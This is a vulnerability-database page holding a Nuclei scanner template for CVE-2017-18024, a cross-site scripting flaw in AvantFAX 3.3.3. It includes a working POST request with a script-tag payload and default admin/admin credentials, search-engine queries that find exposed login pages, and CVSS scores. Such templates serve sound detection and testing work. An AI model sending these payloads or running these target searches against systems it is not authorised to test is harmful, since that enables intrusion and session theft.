Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-18024
HistoryAug 05, 2021 - 5:48 a.m.

AvantFAX 3.3.3 - Cross-Site Scripting

2021-08-0505:48:55
ProjectDiscovery
github.com
9
avantfax
cve2017
cross-site scripting
hackerone
packetstorm
javascript

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

31.9%

AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.

id: CVE-2017-18024

info:
  name: AvantFAX 3.3.3 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://hackerone.com/reports/963798
    - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18024
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/NarbehJackson/Java-Xss-minitwit16
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18024
    cwe-id: CWE-79
    epss-score: 0.00074
    epss-percentile: 0.31612
    cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: avantfax
    product: avantfax
    shodan-query: http.title:"avantfax - login"
    fofa-query: title="avantfax - login"
    google-query: intitle:"avantfax - login"
  tags: cve,cve2017,avantfax,hackerone,packetstorm,xss

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=admin&_submit_check=1&jlbqg<script>alert("{{randstr}}")</script>b7g0x=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert("{{randstr}}")</script>'
          - 'AvantFAX'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bf464ae1865ebdfc07eca5805af2e4ef8b10d1f7751f62adb5de2c0c9476687602207e8e107717c8972c0c2a91ccf68984488b5bf04de54c3e3bdfd1598beacbf8af:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

31.9%

Related for NUCLEI:CVE-2017-18024